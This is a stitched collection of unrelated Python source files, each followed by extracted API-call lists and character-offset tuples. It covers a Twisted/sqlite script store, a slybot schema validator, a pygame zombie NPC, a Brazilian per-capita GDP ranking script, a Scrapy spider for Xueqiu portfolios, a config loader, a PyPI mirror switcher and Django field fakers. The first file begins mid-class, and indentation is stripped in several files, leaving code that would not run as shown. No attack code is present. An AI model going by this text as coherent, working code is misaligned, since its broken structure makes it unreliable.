DB._edit_script(txn, script)
return script
@staticmethod
def edit_script(script):
db = DB.get_db()
return db.runInteraction(DB._edit_script, script)
@staticmethod
def _edit_script(txn, script):
DB._check_db_ready()
s = pickle.dumps(script)
txn.execute('''UPDATE Scripts Set script = ? WHERE id = ?''', (s, script.id))
return script
@staticmethod
def delete_script(sid):
db = DB.get_db()
return db.runInteraction(DB._delete_script, sid)
@staticmethod
def _delete_script(txn, sid):
DB._check_db_ready()
txn.execute('''DELETE FROM Scripts WHERE id = ?''', (sid,))
return sid
@staticmethod
def get_scripts():
db = DB.get_db()
return db.runInteraction(DB._get_scripts)
@staticmethod
def _get_scripts(txn):
DB._check_db_ready()
txn.execute('''SELECT * FROM Scripts''')
scripts = {}
ss = txn.fetchall()
for s in ss:
scripts[s[0]] = pickle.loads(s[1])
return scripts
@staticmethod
def get_id_from_ip(ip, control=False):
db = DB.get_db()
return db.runInteraction(DB._get_id_from_ip, ip, control)
@staticmethod
def _get_id_from_ip(txn, ip, control):
DB._check_db_ready()
if control:
table = "ControlServers"
else:
table = "DeviceServers"
        # Table names cannot be bound as SQL parameters, so interpolate the (whitelisted) name directly.
        txn.execute('''SELECT id FROM %s WHERE ip = ?''' % table, (ip,))
return txn.fetchone()[0]
@staticmethod
def update_devices(ip, port, name, devices):
db = DB.get_db()
return db.runInteraction(DB._update_devices, ip, port, name, devices)
@staticmethod
def _update_devices(txn, ip, port, name, devices):
DB._check_db_ready()
txn.execute('''SELECT * FROM DeviceServers WHERE ip = ?''', (ip,))
server = txn.fetchone()
if server is None:
txn.execute('''INSERT INTO DeviceServers (ip, port, name) VALUES (?, ?, ?)''', (ip, port, name))
cid = txn.lastrowid
txn.execute('''SELECT * FROM DeviceServers WHERE ip = ?''', (ip,))
server = txn.fetchone()
else:
cid = server["id"]
for device in devices:
name = device["Name"]
txn.execute('''SELECT id FROM Devices WHERE device_server = ? and name = ?''', (cid, name))
r = txn.fetchone()
if r is None:
txn.execute("INSERT INTO Devices (name, device_server, device_id) VALUES (?, ?, ?)",
(name, cid, device["DevId"]))
did = txn.lastrowid
else:
did = r["id"]
txn.execute("UPDATE Devices SET device_id = ? WHERE id = ?", (device["DevId"], did))
for field in device["Fields"]:
txn.execute('''INSERT INTO RawData (device, field, value) VALUES (?, ?, ?)''',
(did, field["Name"], field["Value"]))
return server
@staticmethod
def update_methods(ip, name, methods):
db = DB.get_db()
return db.runInteraction(DB._update_methods, ip, name, methods)
@staticmethod
def _update_methods(txn, ip, name, methods):
DB._check_db_ready()
txn.execute('''SELECT id FROM ControlServers WHERE ip = ?''', (ip,))
r = txn.fetchone()
if r is None:
txn.execute('''INSERT INTO ControlServers (ip, name) VALUES (?, ?)''', (ip, name))
cid = txn.lastrowid
else:
cid = r["id"]
for method in methods:
name = method["Name"]
args = json.dumps(method["Fields"])
            txn.execute('''SELECT id FROM Methods WHERE control_server = ? AND name = ?''', (cid, name))
r = txn.fetchone()
if r is None:
txn.execute("INSERT INTO Methods (name, arguments, control_server) VALUES (?, ?, ?)", (name, args, cid))
else:
mid = r["id"]
txn.execute("UPDATE Methods SET arguments = ? WHERE id = ?", (args, mid))
return
@staticmethod
def get_methods():
db = DB.get_db()
return db.runInteraction(DB._get_methods)
@staticmethod
def _get_methods(txn):
DB._check_db_ready()
        txn.execute('''SELECT Methods.id, Methods.name, Methods.arguments,
                ControlServers.name as ControlName, ControlServers.ip as ControlIp
                FROM Methods, ControlServers
                WHERE Methods.control_server = ControlServers.id''')
methods = txn.fetchall()
mres = []
for method in methods:
tmp = {"MethodId": method['id'], "Name": method['name'], "Fields": json.loads(method["arguments"]),
"SD": {"Name": method["ControlName"],
"IP": method["ControlIp"]}}
mres.append(tmp)
return mres
@staticmethod
def get_devices():
db = DB.get_db()
return db.runInteraction(DB._get_devices)
@staticmethod
def _get_devices(txn):
DB._check_db_ready()
txn.execute('''SELECT Devices.name, Devices.id, DeviceServers.ip, DeviceServers.name AS DeviceServerName
FROM Devices, DeviceServers WHERE Devices.device_server=DeviceServers.id''')
res = txn.fetchall()
devices = []
for line in res:
devices.append({"ID": line["id"], "Name": line["name"],
"SD": {"Name": line["DeviceServerName"], "IP": line["ip"]}})
return devices
@staticmethod
def get_remote_device_from_local(devid):
db = DB.get_db()
return db.runInteraction(DB._get_remote_device_from_local, devid)
@staticmethod
def _get_remote_device_from_local(txn, devid):
DB._check_db_ready()
txn.execute('''SELECT Devices.device_id as DevId, DeviceServers.ip From Devices, DeviceServers
            WHERE Devices.device_server = DeviceServers.id AND Devices.id = ?''', (devid,))
r = txn.fetchone()
return int(r["DevId"]), r["ip"]
|
[
"pickle.loads",
"json.loads",
"pickle.dumps",
"json.dumps",
"twisted.enterprise.adbapi.ConnectionPool"
] |
[((3039, 3059), 'pickle.dumps', 'pickle.dumps', (['script'], {}), '(script)\n', (3051, 3059), False, 'import pickle\n'), ((3452, 3472), 'pickle.dumps', 'pickle.dumps', (['script'], {}), '(script)\n', (3464, 3472), False, 'import pickle\n'), ((311, 374), 'twisted.enterprise.adbapi.ConnectionPool', 'adbapi.ConnectionPool', (['"""sqlite3"""', 'DB.filename'], {'cp_openfun': 'callb'}), "('sqlite3', DB.filename, cp_openfun=callb)\n", (332, 374), False, 'from twisted.enterprise import adbapi\n'), ((4218, 4236), 'pickle.loads', 'pickle.loads', (['s[1]'], {}), '(s[1])\n', (4230, 4236), False, 'import pickle\n'), ((6850, 6878), 'json.dumps', 'json.dumps', (["method['Fields']"], {}), "(method['Fields'])\n", (6860, 6878), False, 'import json\n'), ((7876, 7907), 'json.loads', 'json.loads', (["method['arguments']"], {}), "(method['arguments'])\n", (7886, 7907), False, 'import json\n')]
|
"""Simple validation of specifications passed to slybot"""
from os.path import dirname, join
import json
import rfc3987
from urlparse import urlparse, parse_qsl
from urllib import urlencode
from urllib2 import unquote
from jsonschema import Draft3Validator, RefResolver, FormatChecker
_PATH = dirname(__file__)
def load_schemas():
filename = join(_PATH, "schemas.json")
return dict((s["id"], s) for s in json.load(open(filename)))
_SCHEMAS = load_schemas()
class SlybotJsonSchemaValidator(Draft3Validator):
DEFAULT_TYPES = Draft3Validator.DEFAULT_TYPES.copy()
DEFAULT_TYPES.update({
"mapping": dict,
})
def get_schema_validator(schema):
resolver = RefResolver("", schema, _SCHEMAS)
@FormatChecker.cls_checks('url', (ValueError,))
def is_valid_uri(instance):
if not isinstance(instance, basestring):
return True
uri = urlparse(instance)
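        # Normalize the query string (unquote, then re-encode) so the full IRI passes strict RFC 3987 parsing.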
query = urlencode(parse_qsl(unquote(uri.query.encode('utf-8'))))
return rfc3987.parse(uri._replace(query=query).geturl(),
rule='URI')
return SlybotJsonSchemaValidator(_SCHEMAS[schema], resolver=resolver,
format_checker=FormatChecker())
def validate_project_schema(specs):
project = specs["project"]
get_schema_validator("project").validate(project)
items = specs["items"]
get_schema_validator("items").validate(items)
extractors = specs["extractors"]
get_schema_validator("extractors").validate(extractors)
spider_schema_validator = get_schema_validator("spider")
for spider in specs["spiders"].values():
spider_schema_validator.validate(spider)
return True
|
[
"jsonschema.FormatChecker.cls_checks",
"jsonschema.Draft3Validator.DEFAULT_TYPES.copy",
"os.path.dirname",
"jsonschema.RefResolver",
"urlparse.urlparse",
"os.path.join",
"jsonschema.FormatChecker"
] |
[((297, 314), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (304, 314), False, 'from os.path import dirname, join\n'), ((352, 379), 'os.path.join', 'join', (['_PATH', '"""schemas.json"""'], {}), "(_PATH, 'schemas.json')\n", (356, 379), False, 'from os.path import dirname, join\n'), ((544, 580), 'jsonschema.Draft3Validator.DEFAULT_TYPES.copy', 'Draft3Validator.DEFAULT_TYPES.copy', ([], {}), '()\n', (578, 580), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n'), ((691, 724), 'jsonschema.RefResolver', 'RefResolver', (['""""""', 'schema', '_SCHEMAS'], {}), "('', schema, _SCHEMAS)\n", (702, 724), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n'), ((731, 777), 'jsonschema.FormatChecker.cls_checks', 'FormatChecker.cls_checks', (['"""url"""', '(ValueError,)'], {}), "('url', (ValueError,))\n", (755, 777), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n'), ((897, 915), 'urlparse.urlparse', 'urlparse', (['instance'], {}), '(instance)\n', (905, 915), False, 'from urlparse import urlparse, parse_qsl\n'), ((1222, 1237), 'jsonschema.FormatChecker', 'FormatChecker', ([], {}), '()\n', (1235, 1237), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n')]
|
import pygame
from Tile import Tile
from random import randint
from Character import Character
from Character import Direction
__author__ = '<NAME>'
"""
The Zombie class defines a zombie NPC for this game
"""
class Zombie(Character):
# Character definition in map.txt
SPAWN_ZONE = "!"
ORIGINAL_ZOMBIE_IMAGE = pygame.image.load('images/zombie.png')
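    # Keep an unrotated copy of the sprite; rotations are applied to this original so repeated turns do not degrade the image.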
START_HEALTH = 100
list_ = []
spawn_tiles = []
_velocity = 4
def __init__(self, x, y):
self.direction = Direction.WEST
self.health = Zombie.START_HEALTH
self.img = Zombie.ORIGINAL_ZOMBIE_IMAGE
Character.__init__(self, x, y)
Zombie.list_.append(self)
@staticmethod
def update(screen, survivor):
        for zombie in list(Zombie.list_):  # iterate over a copy so dead zombies can be removed safely
# Draws the zombie image on the screen
screen.blit(zombie.img, (zombie.x, zombie.y))
if survivor.x % Tile.TILE_SIZE == 0 and survivor.y % Tile.TILE_SIZE == 0:
if zombie.x % Tile.TILE_SIZE == 0 and zombie.y % Tile.TILE_SIZE == 0:
survivor_tile_number = survivor.get_number()
N = survivor_tile_number - (Tile.V)
S = survivor_tile_number + (Tile.V)
E = survivor_tile_number + (Tile.H)
W = survivor_tile_number - (Tile.H)
# Tests if the zombie is either on the tile number of the survivor
# or any other adjacent tiles
if zombie.get_number() in [N, S, E, W, survivor_tile_number]:
survivor.health -= 5
if zombie.health <= 0:
Zombie.list_.remove(zombie)
zombie.__movement()
# This method is responsible for the zombie's rotation and movement
def __movement(self):
if self.dx != 0 and self.dy != 0: # Target is set
X = self.x - self.dx
Y = self.y - self.dy
if X < 0: # --->
self.x += Zombie._velocity
self.rotate(Direction.EAST, Zombie.ORIGINAL_ZOMBIE_IMAGE)
elif X > 0: # <----
self.x -= Zombie._velocity
self.rotate(Direction.WEST, Zombie.ORIGINAL_ZOMBIE_IMAGE)
if Y > 0: # up
self.y -= Zombie._velocity
self.rotate(Direction.NORTH, Zombie.ORIGINAL_ZOMBIE_IMAGE)
elif Y < 0: # down
self.y += Zombie._velocity
self.rotate(Direction.SOUTH, Zombie.ORIGINAL_ZOMBIE_IMAGE)
if X == 0 and Y == 0:
self.dx, self.dy = 0, 0
@staticmethod
def spawn(total_frames, FPS):
# spawn a new zombie every FPS frames
if total_frames % (FPS) == 0:
# Perform a sound effect somewhat periodically
if total_frames % (FPS * 6) == 0:
random_sound_effect = randint(0, 2)
# TURNED OFF SOUND FOR DEBUGGING
"""
sounds = [pygame.mixer.Sound('audio/zs1.ogg'),
pygame.mixer.Sound('audio/zs2.ogg'),
pygame.mixer.Sound('audio/zs3.ogg')]
sound = sounds[ random_sound_effect ]
sound.play()
"""
# Get the spawn tile number, get the tile itself and create a zombie there
random_spawn_zone = randint(0, len(Zombie.spawn_tiles) - 1)
tile_num = Zombie.spawn_tiles[random_spawn_zone]
spawn_node = Tile.get_tile(tile_num)
Zombie(spawn_node.x, spawn_node.y)
|
[
"pygame.image.load",
"Tile.Tile.get_tile",
"random.randint",
"Character.Character.__init__"
] |
[((326, 364), 'pygame.image.load', 'pygame.image.load', (['"""images/zombie.png"""'], {}), "('images/zombie.png')\n", (343, 364), False, 'import pygame\n'), ((615, 645), 'Character.Character.__init__', 'Character.__init__', (['self', 'x', 'y'], {}), '(self, x, y)\n', (633, 645), False, 'from Character import Character\n'), ((3534, 3557), 'Tile.Tile.get_tile', 'Tile.get_tile', (['tile_num'], {}), '(tile_num)\n', (3547, 3557), False, 'from Tile import Tile\n'), ((2913, 2926), 'random.randint', 'randint', (['(0)', '(2)'], {}), '(0, 2)\n', (2920, 2926), False, 'from random import randint\n')]
|
#-*- coding:utf-8 -*-
# Importing libraries
import os
import funcoes
arquivo = funcoes.open_file_mod()
#-------------------------------------------------------------------------------------------------------
q2 = input("Deseja passar um ano para saber o Ranking de Pib per capita por estado(caso não queira mandaremos o ano default)[S/N]? ").upper().strip()
while q2 not in ['S','N','SIM','NÃO','NAO']:
q2 = input("Digite apenas ['S' para sim ou 'N' para não). Deseja passar um ano para saber o Ranking de Pib per capita por estado? ").upper().strip()
if q2 in ['S','SIM']:
ano = None
try:
ano = int(input("Qual ano você deseja obter o Ranking? "))
except ValueError as err:
print("O ano precisa ser um número do tipo inteiro - erro: ", err)
while ((ano not in range(2010,2019)) and (ano not in [-1])):
try:
ano = int(input("O ano precisa ser um número inteiro entre 2010 e 2018. Qual ano você deseja obter o Ranking? Ou digite -1 para usar valor default: "))
except ValueError as err:
print("O ano precisa ser um número do tipo inteiro", err)
if ano == -1:
ano = 2010
else:
ano = 2010
dict_estados ={}
for linha in arquivo:
    dict_estados[linha[2]] = None  # collect every state (column 2) found in the data as a key
i = 0
qtd_cidades = 0 # counts how many city records match the state and the chosen year
pib_estado = 0 # accumulates the per-capita GDP of those records for the chosen year
for key in dict_estados:
for linha in arquivo:
if ((int(linha[0]) == ano) and (linha[2] == key)):
pib_estado += float(linha[13])
qtd_cidades+=1
media = pib_estado/qtd_cidades
qtd_cidades = 0
pib_estado = 0
dict_estados[key]= round(media,2)
ocorrencias = []
for idx,item in enumerate(sorted(dict_estados, key = dict_estados.get,reverse=True)):
print (f'{idx+1} - {item} - R${dict_estados[item]}')
ocorrencias.append(f'{idx+1:4}{" "*4} - {item:19} - R${dict_estados[item]:>10.2f}')
def mostrar_ranking():
s = open('questao_02/saida_q2.txt','a', encoding="utf-8")
s.write(f"RANKING {ano} - PIB PER CAPTA MÉDIO TODOS OS ESTADOS\n")
s.write('Posição - Estado - Pib per capta médio\n')
for n in ocorrencias:
s.write(f'{n}\n')
s.close()
# conditional to check whether the output file already exists; if it does, the program deletes it and recreates it by calling the function defined above
if os.path.exists('questao_02/saida_q2.txt'): # checking whether the path exists
os.remove('questao_02/saida_q2.txt')
mostrar_ranking()
# if it does not exist yet, just create the file and write the data
else:
mostrar_ranking()
|
[
"os.remove",
"os.path.exists",
"funcoes.open_file_mod"
] |
[((83, 106), 'funcoes.open_file_mod', 'funcoes.open_file_mod', ([], {}), '()\n', (104, 106), False, 'import funcoes\n'), ((2469, 2510), 'os.path.exists', 'os.path.exists', (['"""questao_02/saida_q2.txt"""'], {}), "('questao_02/saida_q2.txt')\n", (2483, 2510), False, 'import os\n'), ((2549, 2585), 'os.remove', 'os.remove', (['"""questao_02/saida_q2.txt"""'], {}), "('questao_02/saida_q2.txt')\n", (2558, 2585), False, 'import os\n')]
|
import scrapy
import json5
class XqbotSpider(scrapy.Spider):
name = 'dmt'
allowed_domains = ['www.xueqiu.com']
start_urls = ['https://xueqiu.com/P/ZH2126346',
'https://xueqiu.com/P/ZH2268976',
]
def parse(self, response):
# pass
#print(response.text)
#page = response.url.split("/")[-1]
# filename = f'xueqiu{page}.html'
#with open(filename, 'wb') as f:
# f.write(response.body)
# # f.write(response.text)
# self.log(f'Saved file {filename}')
html = response.text
pos_start = html.find('SNB.cubeInfo = ') + len('SNB.cubeInfo = ')
pos_end = html.find('SNB.cubePieData')
data = html[pos_start:pos_end]
#print(data)
data = data.rstrip() # get rid of ending space
data = data[:-1] # get rid of the last ";"
dic = json5.loads(data)
#print('********************')
#name = dic['name']
#print(name.encode('utf-8'))
#print(dic['name'].encode('utf-8'))
#print('********************')
scraped_data = {
'name' : dic['name'],
'symbol' : dic['symbol'],
'daily_gain' : dic['daily_gain'],
'monthly_gain' : dic['monthly_gain'],
'total_gain' : dic['total_gain'],
'net_value' : dic['net_value'],
'rank_percent' : dic['rank_percent'],
'annualized_gain_rate' : dic['annualized_gain_rate'],
'bb_rate' : dic['bb_rate'],
}
#print(scraped_data)
yield scraped_data
|
[
"json5.loads"
] |
[((881, 898), 'json5.loads', 'json5.loads', (['data'], {}), '(data)\n', (892, 898), False, 'import json5\n')]
|
from abc import ABC
from typing import Hashable, Any
from pathlib import Path
from os import getenv
import logging
import yaml
class ConfigLocationError(Exception):
pass
class BaseConfig(ABC):
def __init__(self):
self.log = logging.getLogger(self.__class__.__name__)
@property
def as_dict(self) -> dict[Hashable, Any]:
raise NotImplementedError()
@property
def username(self) -> str:
raise NotImplementedError()
@property
def password(self) -> str:
raise NotImplementedError()
@property
def contact_points(self) -> list[str]:
raise NotImplementedError()
@property
def keyspace_name(self) -> str:
raise NotImplementedError()
class FileConfig(BaseConfig):
@property
def username(self):
return self.as_dict.get("username")
@property
def password(self) -> str:
return self.as_dict.get("password")
@property
def contact_points(self) -> list[str]:
return self.as_dict.get("contact_points")
@property
def keyspace_name(self) -> str:
return self.as_dict.get("keyspace_name")
DEFAULT_CONFIG_PATHS = (
"argus.local.yaml",
"argus.yaml",
getenv("HOME") + "/.argus.yaml"
)
def __init__(self, filepath: str = None):
super().__init__()
if not filepath:
for file in self.DEFAULT_CONFIG_PATHS:
self.log.info("Trying %s", file)
if Path(file).exists():
filepath = file
break
if not filepath:
self.log.error("All config locations were tried and no config file found")
raise ConfigLocationError("No config file supplied and no config exists at default location")
self.filepath = filepath
self._credentials = None
@property
def as_dict(self) -> dict[Hashable, Any]:
if self._credentials:
return self._credentials
path = Path(self.filepath)
if not path.exists():
raise ConfigLocationError(f"File not found: {self.filepath}")
with open(path.absolute(), "rt", encoding="utf-8") as file:
self._credentials = yaml.safe_load(file)
return self._credentials
class Config(BaseConfig):
@property
def username(self) -> str:
return self.as_dict.get("username")
@property
def password(self) -> str:
return self.as_dict.get("password")
@property
def contact_points(self) -> list[str]:
return self.as_dict.get("contact_points")
@property
def keyspace_name(self) -> str:
return self.as_dict.get("keyspace_name")
def __init__(self, username: str, password: str, contact_points: list[str], keyspace_name: str):
super().__init__()
self._config = {
"username": username,
"password": password,
"contact_points": contact_points,
"keyspace_name": keyspace_name,
}
@property
def as_dict(self) -> dict[Hashable, Any]:
return self._config
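# Hedged usage sketch (editor's addition, not part of the original module).
# Config takes the four connection values directly; FileConfig searches
# DEFAULT_CONFIG_PATHS when no path is given and raises ConfigLocationError
# if nothing is found. The literal values below are illustrative only.
if __name__ == "__main__":
    explicit = Config(
        username="argus_user",           # example values, not from the source
        password="example-password",
        contact_points=["127.0.0.1"],
        keyspace_name="argus",
    )
    print(explicit.as_dict)
    try:
        file_based = FileConfig()     # falls back through DEFAULT_CONFIG_PATHS
        print(file_based.as_dict)
    except ConfigLocationError as exc:
        print(f"No config file found: {exc}")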
|
[
"pathlib.Path",
"yaml.safe_load",
"os.getenv",
"logging.getLogger"
] |
[((244, 286), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (261, 286), False, 'import logging\n'), ((1997, 2016), 'pathlib.Path', 'Path', (['self.filepath'], {}), '(self.filepath)\n', (2001, 2016), False, 'from pathlib import Path\n'), ((1229, 1243), 'os.getenv', 'getenv', (['"""HOME"""'], {}), "('HOME')\n", (1235, 1243), False, 'from os import getenv\n'), ((2222, 2242), 'yaml.safe_load', 'yaml.safe_load', (['file'], {}), '(file)\n', (2236, 2242), False, 'import yaml\n'), ((1485, 1495), 'pathlib.Path', 'Path', (['file'], {}), '(file)\n', (1489, 1495), False, 'from pathlib import Path\n')]
|
'''
Switch PyPi to domestic (Chinese) mirror sources
'''
import sys
import os
mirrors = '''\
[global]
timeout = 60
index-url = https://mirrors.ustc.edu.cn/pypi/web/simple/
extra-index-url = https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple/\
'''
user = os.path.expanduser('~')
if sys.platform == 'win32':
os.mkdir(f"{user}/AppData/Roaming/pip")
with open(f"{user}/AppData/Roaming/pip/pip.ini", 'w', encoding='utf-8') as fp:
fp.write(mirrors)
elif sys.platform == 'linux' or sys.platform == 'darwin':
os.mkdir(f"{user}/.pip")
with open(f"{user}/.pip/pip.conf", 'w', encoding='utf-8') as fp:
fp.write(mirrors)
|
[
"os.mkdir",
"os.path.expanduser"
] |
[((228, 251), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (246, 251), False, 'import os\n'), ((284, 323), 'os.mkdir', 'os.mkdir', (['f"""{user}/AppData/Roaming/pip"""'], {}), "(f'{user}/AppData/Roaming/pip')\n", (292, 323), False, 'import os\n'), ((495, 519), 'os.mkdir', 'os.mkdir', (['f"""{user}/.pip"""'], {}), "(f'{user}/.pip')\n", (503, 519), False, 'import os\n')]
|
import random
from django.conf import settings
from django.template.loader import render_to_string
class FieldFaker:
"""
Base class to return faker and kwargs
for a given model field
:faker - the Faker method to be called
:faker_kwargs - the kwargs to be passed to the faker method
:unquote_kwargs - the kwargs that need to be displayed without quote
:template - the template to use to render the Faker field
"""
faker_class = ''
faker_kwargs = []
unquote_kwargs = []
imports = []
template = "factory_generator/default.py-tpl"
def __init__(self, model, field):
self.model = model
self.field = field
self.root_dir = getattr(settings, 'FACTORY_ROOT_DIR', 'model_factories')
super(FieldFaker, self).__init__()
@property
def context(self):
"""
Return the context needed to properly define the faker
"""
return {
'faker_class': self.get_faker_class(),
'faker_kwargs': self.get_faker_kwargs(),
'field': self.field
}
def render(self):
return render_to_string(self.template, self.context)
def get_faker_class(self):
return self.faker_class
def get_faker_kwargs(self):
"""
Get kwargs for the faker instance
"""
if len(self.faker_kwargs) == 0:
return ''
kwargs = {}
for kwarg in self.faker_kwargs:
method = "get_{kwarg}".format(kwarg=kwarg)
if hasattr(self, method):
kwargs[kwarg] = getattr(self, method)()
else:
if hasattr(self, kwarg):
kwargs[kwarg] = getattr(self, kwarg)
else:
raise ValueError('Missing property `{kwarg}` or method `get_{kwarg}`for `{class_name}`'.format(
class_name=self.__class__.__name__,
kwarg=kwarg
))
arr = []
for (key,val) in kwargs.items():
if key in self.unquote_kwargs:
arr.append("{!s}={!s}".format(key,val))
else:
arr.append("{!s}={!r}".format(key,val))
return ', '.join(arr)
class BigIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return -9223372036854775808
def get_max(self):
return 9223372036854775807
class BinaryFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "length"]
provider = "binary"
length = 300
class BooleanFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "elements"]
provider = "random_element"
def get_elements(self):
if self.field.null:
return (None, True, False)
else:
return (True, False)
class CharFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "max_chars"]
provider = "pystr"
def get_max_chars(self):
return self.field.max_length
class ChoiceFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "elements"]
unquote_kwargs = ["elements"]
provider = "random_element"
def get_elements(self):
return "{field_name}_CHOICES".format(
field_name = self.field.name.upper()
)
class DateFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime", "tzinfo"]
unquote_kwargs = ["tzinfo"]
provider = "date_time"
imports = ['django.utils.timezone']
def get_end_datetime(self):
return None
def get_tzinfo(self):
return "timezone.get_current_timezone()"
class DateTimeFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime", "tzinfo"]
provider = "date_time"
unquote_kwargs = ["tzinfo"]
imports = ['django.utils.timezone']
def get_end_datetime(self):
return None
def get_tzinfo(self):
return "timezone.get_current_timezone()"
class DecimalFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "left_digits", "right_digits", "positive"]
provider = "pydecimal"
def get_positive(self):
return None
def get_left_digits(self):
return self.field.max_digits - self.field.decimal_places
def get_right_digits(self):
return self.field.decimal_places
class DurationFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime"]
provider = "time_delta"
imports = ['django.utils.timezone']
def get_end_datetime(self):
return None
class EmailFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "safe_email"
class FileFieldFaker(FieldFaker):
faker_class = "factory.django.FileField"
class FilePathFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "file_path"
class FloatFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "left_digits", "right_digits", "positive"]
provider = "pyfloat"
def get_positive(self):
return None
def get_left_digits(self):
return None
def get_right_digits(self):
return None
class ForeignKeyFaker(FieldFaker):
faker_class = "factory.SubFactory"
faker_kwargs = ["factory"]
def get_factory(self):
to = self.field.remote_field.model.__name__
app_label = self.field.remote_field.model._meta.app_label
return "{root_dir}.{app_label}.{to}Factory".format(
root_dir=self.root_dir,
app_label=app_label,
to=to
)
class ImageFieldFaker(FieldFaker):
faker_class = "factory.django.ImageField"
class IntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return -2147483648
def get_max(self):
return 2147483647
class GenericIPAddressFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
def get_provider(self):
if self.field.protocol == 'both':
return random.choice(['ipv4', 'ipv6'])
if self.field.protocol == 'IPv4':
return 'ipv4'
        if self.field.protocol == 'IPv6':
return 'ipv6'
class ManyToManyFieldFaker(FieldFaker):
faker_class = None
template = "factory_generator/manytomany.py-tpl"
class NullBooleanFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "elements"]
provider = "random_element"
elements = (None, True, False)
class OneToOneFieldFaker(FieldFaker):
faker_class = "factory.SubFactory"
faker_kwargs = ["factory"]
def get_factory(self):
to = self.field.remote_field.model.__name__
app_label = self.field.remote_field.model._meta.app_label
return "{root_dir}.{app_label}.{to}Factory".format(
root_dir=self.root_dir,
app_label=app_label,
to=to
)
class PositiveIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return 0
def get_max(self):
return 2147483647
class PositiveSmallIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return 0
def get_max(self):
return 32767
class SlugFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "slug"
class SmallIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return -32768
def get_max(self):
return 32767
class TextFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "text"
class TimeFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime"]
provider = "time_object"
end_datetime = None
imports = ['django.utils.timezone']
class URLFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "url"
class UUIDFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "uuid4"
class PointFieldFaker(FieldFaker):
faker_class = "factory.LazyFunction"
faker_kwargs = ["function"]
unquote_kwargs = ["function"]
imports = ['factory_generator.fields_faker.PointFieldFaker']
function = "PointFieldFaker.get_random_point"
@staticmethod
def get_random_point():
from django.contrib.gis.geos import Point
from faker import Faker
fake = Faker()
return Point(float(fake.longitude()), float(fake.latitude()))
BASE_FIELD_FAKER_MAP = {
"BigIntegerField": "factory_generator.fields_faker.BigIntegerFieldFaker",
"BinaryField": "factory_generator.fields_faker.BinaryFieldFaker",
"BooleanField": "factory_generator.fields_faker.BooleanFieldFaker",
"CharField": "factory_generator.fields_faker.CharFieldFaker",
"ChoiceField": "factory_generator.fields_faker.ChoiceFieldFaker",
"DateField": "factory_generator.fields_faker.DateFieldFaker",
"DateTimeField": "factory_generator.fields_faker.DateTimeFieldFaker",
"DecimalField": "factory_generator.fields_faker.DecimalFieldFaker",
"DurationField": "factory_generator.fields_faker.DurationFieldFaker",
"EmailField": "factory_generator.fields_faker.EmailFieldFaker",
"FileField": "factory_generator.fields_faker.FileFieldFaker",
"FilePathField": "factory_generator.fields_faker.FilePathFieldFaker",
"FloatField": "factory_generator.fields_faker.FloatFieldFaker",
"ForeignKey": "factory_generator.fields_faker.ForeignKeyFaker",
"ImageField": "factory_generator.fields_faker.ImageFieldFaker",
"IntegerField": "factory_generator.fields_faker.IntegerFieldFaker",
"GenericIPAddressField": "factory_generator.fields_faker.GenericIPAddressFieldFaker",
"ManyToManyField": "factory_generator.fields_faker.ManyToManyFieldFaker",
"NullBooleanField": "factory_generator.fields_faker.NullBooleanFieldFaker",
"OneToOneField": "factory_generator.fields_faker.OneToOneFieldFaker",
"PositiveIntegerField": "factory_generator.fields_faker.PositiveIntegerFieldFaker",
"PositiveSmallIntegerField": "factory_generator.fields_faker.PositiveSmallIntegerFieldFaker",
"SlugField": "factory_generator.fields_faker.SlugFieldFaker",
"SmallIntegerField": "factory_generator.fields_faker.SmallIntegerFieldFaker",
"TextField": "factory_generator.fields_faker.TextFieldFaker",
"TimeField": "factory_generator.fields_faker.TimeFieldFaker",
"URLField": "factory_generator.fields_faker.URLFieldFaker",
"UUIDField": "factory_generator.fields_faker.UUIDFieldFaker",
"PointField": "factory_generator.fields_faker.PointFieldFaker",
}
def get_field_faker_map():
base_field_faker_map = getattr(settings, 'FACTORY_FIELD_FAKER_MAP', {})
